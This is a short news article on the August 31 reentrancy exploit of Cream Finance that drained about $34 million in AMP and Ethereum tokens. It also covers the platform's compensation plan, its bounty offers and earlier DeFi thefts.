A new cryptocurrency platform attack has cast a shadow over the notion of crypto as a whole being extremely secure. The attack was targeting Cream Finance, an entity that describes itself as a "decentralized lending protocol for individuals".
The attack exploited a vulnerability that allowed the hackers to steal around $24 million in AMP tokens and another about $10 million in Ethereum tokens.
According to Cream Finance, the attack took place on August 31. Later detailed analysis showed that the hackers took advantage of a reentrancy bug which stemmed from the way AMP token contracts and functions were utilized in the exchange.
There is a detailed post on Cream Finance's website that explains how the hackers managed to "nest" a second 'borrow' function and execute it before the initial one was updated. The same post states that the issue was not due to a "bug or issue" inside AMP's code.
After investigating the matter with the help of security firm PeckShield - a name that is well-known in blockchain security, Cream Finance found that the bug was caused by the way AMP was integrated and implemented within Cream's platform and Cream owned up to the issue.
Cream has also stated that they will be compensating clients for any stolen tokens. The DeFi platform is also willing to let the hackers hold on to 10% of the stolen crypto without any repercussions, if the bad actors willingly return the tokens they stole. This is not too unusual, considering how many companies pay sizable bug bounties in somewhat similar circumstances, only without any real crime involved.
Cream Finance is taking another, bolder approach towards attempting to punish the hackers in case they won't cooperate. The platform is offering a massive 50% of the stolen total as headhunter bounty reward payment for anyone who supplies reliable information on the bad actor's identity, which in turn leads to their arrest.
ZDNet reminds that this is not the first time Cream Finance has become the target of a successful attack. In February 2021 another attack using a different exploit led to the loss of over $37 million. This is also not the biggest crypto theft of this kind. In early August 2021 DeFi platform Poly Network was hit by a lone attacker who managed to drain over half a billion dollars’ worth of crypto tokens.